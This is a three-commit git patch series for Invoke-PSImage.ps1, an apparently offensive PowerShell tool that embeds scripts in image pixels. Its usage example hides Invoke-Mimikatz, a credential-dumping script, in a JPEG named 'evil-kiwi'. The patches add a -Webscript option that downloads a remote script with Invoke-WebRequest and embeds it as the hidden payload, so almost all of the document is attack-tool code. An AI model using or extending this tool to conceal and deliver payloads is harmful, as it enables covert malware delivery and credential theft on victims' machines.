From 346fe8c0c0a9188ef2e33091137659707e482334 Mon Sep 17 00:00:00 2001 From: Dixie Flatline Date: Tue, 19 Dec 2017 17:06:28 +0200 Subject: [PATCH 1/3] Added ability to download script from web --- Invoke-PSImage.ps1 | 20 +++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/Invoke-PSImage.ps1 b/Invoke-PSImage.ps1 index b11ad92..046ebd4 100644 --- a/Invoke-PSImage.ps1 +++ b/Invoke-PSImage.ps1 @@ -41,15 +41,19 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki #> [CmdletBinding()] Param ( - [Parameter(Position = 0, Mandatory = $True)] + [Parameter(Position = 0, Mandatory = $False)] [String] $Script, + + [Parameter(Position = 1, Mandatory = $False)] + [String] + $Webscript, - [Parameter(Position = 1, Mandatory = $True)] + [Parameter(Position = 2, Mandatory = $True)] [String] $Image, - [Parameter(Position = 2, Mandatory = $True)] + [Parameter(Position = 3, Mandatory = $True)] [String] $Out, @@ -63,7 +67,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki [void] [System.Reflection.Assembly]::LoadWithPartialName("System.Web") # Normalize paths beacuse powershell is sometimes bad with them. - if (-Not [System.IO.Path]::IsPathRooted($Script)){ + if ( $Script -And (-Not [System.IO.Path]::IsPathRooted($Script)) ) { $Script = [System.IO.Path]::GetFullPath((Join-Path (pwd) $Script)) } if (-Not [System.IO.Path]::IsPathRooted($Image)){ @@ -74,7 +78,13 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki } # Read in the script - $ScriptBlockString = [IO.File]::ReadAllText($Script) + if ( $WebScript ) { + $R=Invoke-WebRequest $WebScript + $ScriptBlockString=$R.RawContent + } + else { + $ScriptBlockString = [IO.File]::ReadAllText($Script) + } $input = [ScriptBlock]::Create($ScriptBlockString) $payload = [system.Text.Encoding]::ASCII.GetBytes($input) From 9de7ef793064fa31ac286478b2f471bc8878db4f Mon Sep 17 00:00:00 2001 From: Dixie Flatline Date: Tue, 19 Dec 2017 17:26:31 +0200 Subject: [PATCH 2/3] Added a question mark (as of issues) https://github.com/peewpw/Invoke-PSImage/issues/1 --- Invoke-PSImage.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Invoke-PSImage.ps1 b/Invoke-PSImage.ps1 index 046ebd4..531ca94 100644 --- a/Invoke-PSImage.ps1 +++ b/Invoke-PSImage.ps1 @@ -80,7 +80,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki # Read in the script if ( $WebScript ) { $R=Invoke-WebRequest $WebScript - $ScriptBlockString=$R.RawContent + $ScriptBlockString=$R.RawContent+";" } else { $ScriptBlockString = [IO.File]::ReadAllText($Script) From 892a5426300031245119e70bd94d8995ed841a65 Mon Sep 17 00:00:00 2001 From: Dixie Flatline Date: Tue, 19 Dec 2017 17:30:22 +0200 Subject: [PATCH 3/3] Content instead of RawContent from WebScript --- Invoke-PSImage.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Invoke-PSImage.ps1 b/Invoke-PSImage.ps1 index 531ca94..7733ed6 100644 --- a/Invoke-PSImage.ps1 +++ b/Invoke-PSImage.ps1 @@ -80,7 +80,7 @@ PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-ki # Read in the script if ( $WebScript ) { $R=Invoke-WebRequest $WebScript - $ScriptBlockString=$R.RawContent+";" + $ScriptBlockString=$R.Content+";" } else { $ScriptBlockString = [IO.File]::ReadAllText($Script)